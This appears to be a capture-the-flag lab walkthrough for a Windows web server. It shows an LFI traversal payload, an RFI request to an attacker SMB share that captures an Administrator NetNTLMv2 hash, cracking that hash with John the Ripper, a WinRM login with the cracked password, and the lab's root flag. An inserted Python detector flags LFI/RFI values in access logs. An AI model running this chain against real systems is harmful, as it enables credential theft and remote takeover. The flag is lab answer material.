Respond
Target Information:
- IP: 10.129.113.205
- TCP Port 80: Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
==============================================================
Task #1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
- A: unika.htb
- To visit, edit /etc/hosts to include:
  10.129.113.205 unika.htb
- This allows us to resolve the custom TLD locally
Task #2: Which scripting language is being used on the server to generate webpages?
- A: PHP
- Shown in the service banner from the nmap scan:
  $ nmap 10.129.113.205 -sC -sV -T4 -Pn -p-
  Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 14:46 EST
  Nmap scan report for unika.htb (10.129.113.205)
  Host is up (0.11s latency).
  Not shown: 65532 filtered ports
  PORT     STATE SERVICE    VERSION
  80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
  |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
  |_http-title: Unika
  5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  7680/tcp open  pando-pub?
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Task #3: What is the name of the URL parameter which is used to load different language versions of the webpage?
- A: page
- Enumerate the site with:
  gobuster dir --url 10.129.113.205 --wordlist common.txt
- DE example: http://unika.htb/index.php?page=german.html
Task #4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
- A: ../../../../../../../../windows/system32/drivers/etc/hosts
- Check whether LFI works with that value
Task #5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
- A: //10.10.14.6/somefile
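As an added defender-side example that is not part of these notes, a Python check that classifies values of the page parameter the way a hardened include handler or a log-review script would (the allowlisted page names are assumed), then scans a few constructed Apache access-log lines for the LFI and RFI forms from Tasks 4 and 5:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Allowlist of language pages the site is assumed to serve legitimately.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

# Apache common-log prefix: client, ident, user, [time] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_page_value(value: str) -> str:
    """Return 'allowed', 'rfi', 'lfi' or 'unknown' for a raw ?page= value."""
    # Decode percent-encoding and normalise Windows separators before matching.
    v = unquote(value).replace("\\", "/")
    if v in ALLOWED_PAGES:
        return "allowed"
    # scheme://host/... (http, smb, ...; scheme of 2+ chars so "C:" is not one) or //host/share
    if re.match(r"^[a-z][a-z0-9+.-]+:", v, re.I) or v.startswith("//"):
        return "rfi"
    # Directory traversal, absolute paths, or Windows drive paths leave the web root.
    if "../" in v or v.startswith("/") or re.match(r"^[a-z]:/", v, re.I):
        return "lfi"
    return "unknown"

def scan_access_log(lines):
    """Return (client_ip, verdict, page_value) for every request whose ?page= is not allowlisted."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Apache access-log format
        query = parse_qs(urlsplit(m["target"]).query)
        for value in query.get("page", []):
            verdict = classify_page_value(value)
            if verdict != "allowed":
                findings.append((m["ip"], verdict, value))
    return findings

# Constructed sample log lines; the page values mirror the Task 4/5 candidates.
SAMPLE_LOG = [
    '10.10.14.6 - - [13/Dec/2022:14:50:01 -0500] "GET /index.php?page=french.html HTTP/1.1" 200 4321',
    '10.10.14.6 - - [13/Dec/2022:14:50:07 -0500] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '10.10.14.6 - - [13/Dec/2022:14:50:15 -0500] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 200 0',
    '10.10.14.6 - - [13/Dec/2022:14:50:20 -0500] "GET /index.php?page=%2e%2e%2fwindows%2fwin.ini HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, verdict, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {verdict.upper()} page={value}")
```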
Task #6: What does NTLM stand for?
- A: New Technology LAN Manager
Task #7: Which flag do we use in the Responder utility to specify the network interface?
- A: -I
- https://www.kali.org/tools/responder/
- Install:
  sudo git clone https://github.com/lgandx/Responder /opt/Responder
  pip3 install netifaces
- Add alias responder="python3 /opt/Responder/Responder.py" to ~/.bashrc, then source ~/.bashrc
- Run:
  sudo python3 /opt/Responder/Responder.py -I tun0
- TODO: RESEARCH WHAT tun0 IS!
Task #8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
- A: john the ripper
Task #9: What is the password for the administrator user?
- A: badminton
- Use remote file inclusion pointing at the Responder server IP:
  - Make sure responder is still running
  - Visit "http://unika.htb/index.php?page=//10.10.16.143/anything"; the server tries to fetch the share and Responder captures the NetNTLMv2 challenge/response:
    Administrator::RESPONDER:63ff936b9fdc75cb
- Save the captured hash to hash.txt and crack it:
  john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
- Recovered password: badminton
Task #10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?
- A: 5985
- Info from the nmap scan from earlier; the service is WinRM
- Can connect with evil-winrm:
  sudo apt install ruby rbenv ruby-dev
  gem install evil-winrm
  evil-winrm -u Administrator -p 'badminton' -i 10.129.113.205
  cat C:/Users/mike/Desktop/flag.txt
Submit root flag: ea81b7afddd03efaa0945333ed147fac